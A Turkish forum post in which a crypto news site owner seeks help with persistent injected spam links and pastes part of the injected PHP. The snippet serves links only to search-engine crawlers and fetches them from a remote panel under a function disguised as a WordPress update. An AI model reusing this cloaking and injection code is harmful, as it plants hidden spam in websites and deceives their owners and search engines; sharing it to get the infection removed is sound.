Selamlar.
www.ilkbitcoin.com haber web sitesi için 4 aydır çözülemeyen hacklink sorunu yaşıyoruz. bugüne kadar ismini vermek istemediğim sözde bu konuda uzman kişilere iş yaptırıldı lakin hacklink olayı halen devam ediyor.
Örnek bağlantı linki:
https://ilkbitcoin.com/yazar/ozkankprl sayfa kodunu görüntüle dediğimiz vakit, eklenen linkler görünüyor. Bir ***** sitesine ait linkler. Eklenen link yapısı ve uzantılar sürekli aynı. Bu linkler ana sayfa hariç neredeyse sitenin tamamında görünüyor.
İstediğim plesk panele girip, ftp dosyalarından ilgili eklenen linki taratıp çıkan dosyalardan link silinmesini istemiyorum. Tamamen bu sorunu çözecek birini arıyorum. Öncelik olarak nereden kaynaklı olduğu bulunacak sonra müdahale edilecek. Sitenin eklentileri veya teması ile ilgili olmadığını söyleyebilirim, aynı zamanda sunucuda sorun yok.
Daha önce yaparım diyenler, sadece girip linkleri temizleyip çıktılar, sözde garanti verdiler ama sorun aynı. Son olarak mevcut link yapısını ekliyorum
if(!function_exists("isBotes")){
function isBotes() {
$botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i";
$agent = $_SERVER['HTTP_USER_AGENT'];
if (preg_match($botAgents,$agent))
return true;
else
return false;
}
}
if(!function_exists("wordpres_themes_plugin_update")){
function wordpres_themes_plugin_update(){
$altsayfa = 1;
$bot = 0;
$url = 'https://apiwordpres.com/link/linkpanel.php';